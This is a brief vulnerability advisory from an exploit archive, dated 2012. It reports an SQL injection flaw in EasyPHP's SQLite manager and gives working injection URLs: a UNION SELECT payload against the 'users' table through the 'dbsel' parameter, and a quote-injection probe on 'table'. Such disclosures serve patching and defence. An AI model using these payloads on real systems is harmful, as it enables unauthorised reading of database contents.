EasyPHP SQLite SQL Injection

2012.03.29
Credit: skote_vahshat
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[Title] :[ Easyphp sqlite Sql injection Vulberability ] [Author] :[ skote_vahshat ] [Home] :[ www.t-bh.ir ] [Archive] :[ Http://security7.ir ] [Email] :[ skote.vahshat@Gmail.Com ] ======================================================================== [+]Exploit : http://localhost/home/sqlite/index.php?dbsel=[SQLi ] [+]Demo: http://localhost/home/sqlite/index.php?dbsel=1 union+select+1,2,3+from+users [+] Dwmo: http://localhost/home/sqlite/main.php?dbsel=1&table=t1' ======================================================================

References:

http://security7.ir


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top